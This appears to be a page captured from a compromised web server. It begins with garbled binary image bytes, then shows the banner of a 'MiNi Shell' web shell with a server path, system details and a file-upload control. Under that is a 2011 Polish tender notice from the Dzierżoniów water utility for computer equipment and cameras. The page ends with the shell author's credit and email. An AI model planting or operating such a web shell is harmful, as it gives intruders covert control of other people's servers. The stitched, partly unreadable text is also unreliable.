JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110128/14354-N-2011.html

<p class="kh_header"><b>Dzierżoniów: Dostawa serwera, sprzętu komputerowego i aparatu fotograficznego dla potrzeb Jednostki Realizującej Projekt pn. Uporządkowanie gospodarki wodno-ściekowej na terenie gmin powiatu dzierżoniowskiego - etap I w WiK Sp. z o.o. w Dzierżoniowie</b><br>
<b>Numer ogłoszenia: 14354 - 2011; data zamieszczenia: 28.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi i Kanalizacja Sp. z o.o. , ul. Kilińskiego 25A, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 074 8323701 do 04, faks 074 8323705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wik.dzierzoniow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa serwera, sprzętu komputerowego i aparatu fotograficznego dla potrzeb Jednostki Realizującej Projekt pn. Uporządkowanie gospodarki wodno-ściekowej na terenie gmin powiatu dzierżoniowskiego - etap I w WiK Sp. z o.o. w Dzierżoniowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwa zadania: 
Dostawa serwera, sprzętu komputerowego i aparatu fotograficznego dla potrzeb Jednostki Realizującej Projekt pn. Uporządkowanie gospodarki wodno-ściekowej na terenie gmin powiatu dzierżoniowskiego - etap I w WiK Sp. z o.o. w Dzierżoniowie.

1)	SERWER - 1 szt.
Minimalne wymagania techniczne dla serwera: 
a)Procesor: Czterordzeniowy lub równoważny o wydajności nie mniejszej niż 5000 punktów w teście PassMark (http://cpubenchmark.net/; High End CPUs bez overclockingu) - na dzień ogłoszenia przetargu  zgodnie z Załącznikiem Nr 6 do SIWZ). 
b)RAM: Minimum 16 (szesnaście) GB DDR3 z technologią ECC (minimum 2 kości) 
c)HDD: Minimum 4 (cztery) dyski minimum 300 GB SAS 2.5 cala podłączone podczas pracy (RAID 5) 
d)Kontroler macierzy: Kontroler macierzowy SAS, umożliwiający konfigurację dysków macierzach RAID 0/1/1+0/5 oraz w konfiguracji zamawianych dysków, posiadający minimum 256 MB z podtrzymaniem bateryjnym
e)Płyta główna : Dedykowana do pracy w serwerach
f)Gniazda rozszerzeń: Minimum 2 (dwa) wolne gniazda rozszerzeń na karty PCI-Express lub PCI-X
g)Karta sieciowa: Minimum 2 wolne porty RJ45 (100/1000 Mb/s)
h)Napęd: DVD-RW (+/-)
i)Karta graficzna: Zintegrowana karta graficzna
j)Zasilanie: 2 (dwa) redundantne zasilacze Hot-Plug
k)Wiatraki: redundantne wiatraki Hot-Plug
l)Porty I/O: Minimum : przód: 2 USB 2.0, tył: 2 USB 2.0, 1 port RS232, 2 RJ45, D-Sub 
ł)Akcesoria: Mysz optyczna USB, klawiatura USB
m)Obudowa: Rack maksymalnie 2U z szynami do montażu w szafie, na 8 dysków twardych
n)Obsługiwany system: Minimum Windows 2003 Standard Edition oraz Windows 2008 R2 Standard Edition
o)Gwarancja: Minimum 3 (trzy) lata u klienta z reakcją 24h czas naprawy 72h
p)Zasilacz awaryjny: Minimum 1500VA, 980W, minimum 4 gniazd (dla obudowy do szaf serwerowych) lub 8 gniazd (dla obudowy wolnostojącej) 230V, filtracja przeciwzakłóceniowa RFI/EMI, automatyczne włączanie UPS-a po powrocie zasilania,  oprogramowanie producenta do zarządzania pracą zasilacza z systemu Windows Server 2003/2008, Port szeregowy RS-232

Serwer musi posiadać oznakowanie CE oraz musi być wyprodukowany zgodnie z zapisami Rozporządzenia Parlamentu Europejskiego i Rady (WE) NR 106/2008 z dnia 15 stycznia 2008 r. 
w sprawie wspólnotowego programu znakowania efektywności energetycznej urządzeń biurowych.
Zamawiający wymaga, aby dostarczone urządzenia były nowe i nieużywane oraz pochodziły z oficjalnego kanału sprzedaży.

2)	OPROGRAMOWANIE
a)licencja na oprogramowanie  w wersji OLP: 1 x Microsoft Windows Server 2008 Standard PL, 10 x CAL Microsoft Windows Server 2008 PL, 7 licencji + 1 nośnik x Microsoft Office Professional 2010
b)1 licencja + nośnik - Adobe Acrobat 9.0 Professional PL BOX lub równoważny w zakresie: zapisywanie plików PDF jako plików Microsoft Word lub Excel z zachowaniem układu, czcionek, formatowania i tabel; łączenie elementów pochodzących z różnych źródeł, w tym dokumentów, arkuszy kalkulacyjnych oraz poczty email, w jeden plik PDF; tworzenie zautomatyzowanych zadań składających się z wielu kroków; porównywanie dwóch wersji dokumentu PDF i podświetlanie różnic między nimi.

3)	ZESTAW KOMPUTEROWY - 3 szt.
Minimalne wymagania techniczne dla zestawu komputerowego:
a)Procesor: Minimum dwurdzeniowy o wydajności nie mniejszej niż 4000 punktów w teście PassMark (http://cpubenchmark.net/; High End CPUs bez overclockingu) - na dzień ogłoszenia przetargu  zgodnie z Załącznikiem Nr 6 do SIWZ). 
b)RAM: Minimum 4 (cztery) GB DDR3 (2 kości) 
c)HDD: Minimum 500 GB SATA II
d)Karta sieciowa: RJ45 (100/1000 Mb/s)
e)Napęd: DVD-RW (+/-)
f)Karta graficzna: nie zintegrowana z minimum 1 GB, z wyjściem D-Sub i DVI
g)Porty I/O: Minimum : przód: 2 USB (min 2.0), jedno gniazdo mikrofonu i jedno słuchawkowe, tył: 4 USB (min 2.0), 1 RJ45, 2 porty PS/2 do klawiatury i myszy, wejście liniowe, wyjście liniowe i gniazdo mikrofonowe, 1 RS-232, czytnik kart pamięci
h)Akcesoria: Mysz optyczna , klawiatura USB
i)Obudowa: Mini Tower, czarna
j)Zainstalowany system: Windows 7 Professional PL z usługą instalacji starszej wersji sytemu Windows XP Professional PL
k)Gwarancja: Minimum 3 (trzy) lata z reakcją na następny dzień
l)Monitor: LCD lub LED 22 cala, FullHD 1920x1080, wejście DVI, D-Sub i audio, głośniki, możliwość montażu na ścianie VESA 100 x 100
ł)Zasilacz awaryjny: Minimum 600VA, 300W, minimum 2 wejścia 230V, port RS-232, oprogramowanie producenta do zarządzania pracą zasilacza z systemu Windows XP,7

Zestaw musi posiadać oznakowanie CE oraz musi być wyprodukowany zgodnie z zapisami Rozporządzenia Parlamentu Europejskiego i Rady (WE) NR 106/2008 z dnia 15 stycznia 2008 r. w sprawie wspólnotowego programu znakowania efektywności energetycznej urządzeń biurowych.
Zamawiający wymaga, aby dostarczone urządzenia były nowe i nieużywane oraz pochodziły z oficjalnego kanału sprzedaży.
4)	KOMPUTER PRZENOŚNY (notebook) - 4 szt.
Minimalne wymagania techniczne dla komputera przenośnego (notebook-a):
a)Procesor: Minimum dwurdzeniowy o wydajności nie mniejszej niż 2300 punktów w teście PassMark (http://cpubenchmark.net/; High End CPUs bez overclockingu) - na dzień ogłoszenia przetargu  zgodnie z Załącznikiem Nr 6 do SIWZ).
b)Ekran: Minimum 17 cala LED/LCD, rozdzielczość minimum 1600x900 px, 
c)RAM: Minimum 4(cztery) GB DDR3 
d)HDD: Minimum 320 GB SATA II
e)Karta sieciowa: Przewodowa RJ45 (100/1000 Mb/s) oraz bezprzewodowa w standardzie 802,11b/g/n
f)Napęd: DVD-RW (+/-)
g)Karta graficzna: zewnętrzna, minimum 1 GB, z wyjściem D-Sub lub DVI
h)Porty I/O: Minimum : 3 USB 2.0, 1 RJ45, Złącze combo USB 2.0/eSATA 
i)Akcesoria: Mysz optyczna, torba, oddzielne klawisze numeryczne
j)Zainstalowany system: Windows 7 Professional PL z usługą instalacji starszej wersji sytemu Windows XP Professional PL
k)Gwarancja: Minimum 12 miesięcy

Zestaw musi posiadać oznakowanie CE oraz musi być wyprodukowany zgodnie z zapisami Rozporządzenia Parlamentu Europejskiego i Rady (WE) NR 106/2008 z dnia 15 stycznia 2008 r. 
w sprawie wspólnotowego programu znakowania efektywności energetycznej urządzeń biurowych.
Zamawiający wymaga, aby dostarczone urządzenia były nowe i nieużywane oraz pochodziły z oficjalnego kanału sprzedaży.
5)	SKANER - 2 szt.
Minimalne wymagania techniczne dla skanera:
a)Płaski kolorowy A4
b)Wbudowany dupleksowy podajnik ADF o pojemności minimum 50 kartek
c)Rozdzielczość skanera płaskiego minimum 1200 x 1200 dpi
d)Rozdzielczość z podajnika ADF minimum 600 x 600 dpi
e)Głębia kolorów: kolor wejście 48bit / wyjście 24 bit,  skala szarości wejście 16bit / wyjście 8 bit
f)Prędkość skanowania:Czarno biały, 200 dpi - 25 stron na minutę, Skala szarości, 200 dpi - 25 stron na minutę, Kolor, 200 dpi - 8 stron na minutę
g)Sterowniki minimum MS Windows XP, 7, Vista 32/64 bit
h)Interfejs - USB 2.0 High Speer
i)Dopuszczalne dzienne obciążenie minimum 1000 stron
j)Obszar skanowania: Podajnik ADF - do 216 x 297 mm, Szyba - do 216 x 356 mm
k)oprogramowanie OCR w języku polskim
l)instrukcja w języku polskim

6)	DRUKARKA - 2 szt.
Minimalne wymagania techniczne dla drukarki:
a)System druku: monochromatyczny - laserowy
b)Rozdzielczość: minimum 600x600 dpi,
c)Szybkość druku: minimum 25 str/min,
d)Miesięczne obciążenie: minimum 25000 stron,
e)Drukowanie dwustronne - Dupleks
f)Format oryginału: maksymalnie A4
g)Pamięć minimum 32 MB
h)Funkcje drukowania: drukowanie broszur, N-stron, nakładki, drukowanie plakatu
i)Interfejsy: 10/100BaseTX Ethernet, USB 2.0
j)Protokoły: HTTP, SNMP, TCP/IP
k)Podajnik ręczny
l)Taca na papier na minimum 250 arkuszy A4
ł)Sterowniki: minimum do Windows XP, Vista, 7, Server 2003, 2008
m)Gwarancja minimum 1 rok

7)	APARAT FOTOGRAFICZNY - 2 szt.
Minimalne wymagania techniczne dla aparatu fotograficznego:
a)Aparat kompatybilny z obiektywami typu EF/EF-S lub równoważnymi i lampami błyskowymi 
b)Typ : CCD system czyszczenia matrycy
c)Piksele: minimum 14,5 MP
d)Efektywne piksele  minimum 14,0 MP
e)Tryby Ustawienia ostrości: autofocus automatyczny [A-AF], autofocus pojedynczy, autofocus ciągły,  ręczny
f)Typ AF: TTL, detekcja fazowa
g)  Lampa wspomagająca AF
h)   Stabilizacja mechaniczna obrazu stabilizacja matrycy
i)Wizjer	Optyczny TTL: pokrycie kadru: minimum 95%, ustawienie dioptrii: od -3 dpt. do +1 dpt.
j)Wyświetlacz	minimum 2.7 cala , minimum 230 400 punktów, pokrycie kadru: 100%, regulacja jasności, podgląd na żywo, ruchomy
k)Czułość: Auto,  ISO 100, 200, 400, 800, 1600, 3200
l)Pomiar światła:  wielosegmentowy, centralnie ważony, punktowy
ł)Balans bieli:auto, światło dzienne, pochmurne niebo, światło żarówek,światło jarzeniówek, lampa błyskowa, cień, ustawienia ręczne, korekcja balansu bieli
m)Migawka	minimum 30-1/4000s, bulb
n)Lampa błyskowa, Tryb pracy: auto, błysk wypełniający, brak błysku, wolna synchronizacja, synchronizacja błysku na 2 kurtynę migawki, kompensacja siły błysku +/-2EV, redukcja efektu czerwonych oczu [on/off]
o)Czas ładowania do 4s
p)System zapisu: JPEG, RAW, RAW + JPEG
r)Format pliku Exif 2.21, DCF 2.0, DPOF
s)Tryby wykonywania zdjęć, Tryb sekwencji 2fps [do 4 zdjęć; RAW] , 2fps [do 3 zdjęć; RAW+JPEG], 2fps [bez ograniczeń; JPEG]
t)Samowyzwalacz
u)Złącza: USB 2.0 [High-Speed]
w)Wideo : wyjście A/V [NTSC/PAL]
x)Lampa błyskowa	Tak
y)Zasilanie: akumulator Li-Ion
z)Parametry pracy : Temperatura od 0°C do 40°C.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.21.31.00-6, 30.23.21.10-8, 30.23.70.00-9, 38.65.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Zamawiający określa kwotę wadium w wysokości: 1.700,00 PLN (tysiąc siedemset złotych 00/100)
2)	Wadium może być wnoszone w jednej lub kilku następujących formach:
1.	pieniądzu;
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3.	gwarancjach bankowych;
4.	gwarancjach ubezpieczeniowych;
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.2002 Nr 42, poz. 275, z późn. zm.).
3)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego:
nr  48 1090 2301 0000 0001 1423 9595, z dopiskiem Dostawa serwera, sprzętu komputerowego i aparatu fotograficznego dla potrzeb Jednostki Realizującej Projekt pn. Uporządkowanie gospodarki wodno-ściekowej na terenie gmin powiatu dzierżoniowskiego - etap I w WiK Sp. z o.o. w Dzierżoniowie.
4)	Zamawiający nie dopuszcza złożenia wadium w walucie innej niż złoty polski. Dotyczy to wadium składanego w każdej z możliwych form.
5)	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
6)	W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, powinny być one bezwarunkowe, nieodwołalne i płatne w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego, wykonalne na terytorium Rzeczypospolitej Polskiej, sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
1.	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji,poręczenia (Zamawiającego), gwaranta,poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,
2.	określenie wierzytelności, która ma być zabezpieczona gwarancją, poręczeniem,
3.	kwotę gwarancji, poręczenia,
4.	termin ważności gwarancji, poręczenia,
5.	zobowiązanie gwaranta do: zapłacenia nieodwołalnie i bezwarunkowo kwoty gwarancji, poręczenia w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:
a)	Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
b)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonanie (zakończenie) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie co najmniej 2 dostaw sprzętu komputerowego obejmujących w swoim zakresie co najmniej (każda dostawa): 2 komputery przenośne (notebooki) oraz 1 zestaw komputerowy z oprogramowaniem systemowym i biurowym, 1 drukarkę i 1 skaner.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców , oceniana będzie ich łączna wiedza i doświadczenie - w tym celu Wykonawcy składający ofertę wspólną przedkładają jeden wspólny wykaz usług oraz dokumenty potwierdzające, że każda z tych usług została wykonana należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość dokonania zmian umowy w stosunku do treści oferty, w szczególności:
1.	w przypadku wystąpienia siły wyższej, czyli zdarzenia, którego nie można było przewidzieć, maksymalny okres przesunięcia terminu zakończenia umowy będzie równy okresowi przerwy w świadczeniu usługi. 
Siła wyższa, to zdarzenie zewnętrzne o obiektywnie małym stopniu prawdopodobieństwa pojawienia się zdarzenia w określonej sytuacji, którego szkodliwe następstwo przy zastosowaniu współczesnej techniki uniemożliwia wykonawcy wykonywanie w części lub całości jego zobowiązań.
2.	zmiany stawki podatku VAT lub innych regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy, wraz ze skutkami wprowadzenia takiej zmiany; 
3.	zmiany części zamówienia, których wykonanie wykonawca zamierza powierzyć podwykonawcom.
4.	zmiany danych Zamawiającego i/lub Wykonawcy;
3)	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
4)	W przypadku, o którym mowa w ust. 3, wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.

Wszelkie zmiany treści niniejszej umowy wymagają - pod rygorem nieważności - formy pisemnej w postaci aneksu zatwierdzonego podpisem przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wik.dzierzoniow.pl/przetargi_fs.php?id=351<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi i Kanalizacja Sp. z o.o., ul. Kilińskiego 25a, 58-200 Dzierżoniów - sekretariat na I piętrze budynku administracyjno - biurowego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2011 godzina 10:00, miejsce: Wodociągi i Kanalizacja Sp. z o.o. , ul. Kilińskiego 25a, 58-200 Dzierżoniów - Sekretariat, na I pietrze w budynku administracyjno-biurowym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dostawa będzie współfinansowana ze środków Funduszu Spójności. Zamawiający będzie żądał za udostępnienie SIWZ kwoty wynikającej z kosztów jej druku oraz przekazania.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com